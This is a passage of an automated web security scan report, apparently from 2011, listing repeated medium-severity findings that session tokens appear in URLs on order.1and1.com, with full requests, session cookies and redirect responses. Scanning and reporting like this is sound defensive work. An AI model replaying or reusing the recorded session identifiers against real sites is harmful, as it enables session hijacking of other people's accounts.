Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrStat?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.32. http://order.1and1.com/xml/order/FeatureParallelsPlesk

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsPlesk

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsPlesk?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.33. http://order.1and1.com/xml/order/FeatureParallelsSB

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsSB

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsSB?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.34. http://order.1and1.com/xml/order/FeatureSecurityCertificate

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSecurityCertificate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSecurityCertificate;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSecurityCertificate?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.35. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinux

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinux?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.36. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinuxOpt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.37. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindows

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindows?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.38. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindowsOpt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.39. http://order.1and1.com/xml/order/FeatureServerFirewall

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerFirewall

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerFirewall;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerFirewall?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.40. http://order.1and1.com/xml/order/FeatureServerHarddrive

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerHarddrive

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerHarddrive;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:52:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerHarddrive?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.41. http://order.1and1.com/xml/order/FeatureServerMonitoring

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoring

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoring?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.42. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoringCloud

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoringCloud?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.43. http://order.1and1.com/xml/order/FeatureServerProcessor

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerProcessor

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerProcessor?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.44. http://order.1and1.com/xml/order/FeatureServerRecovery

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerRecovery

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerRecovery;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerRecovery?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.45. http://order.1and1.com/xml/order/FeatureServerSsl

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerSsl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
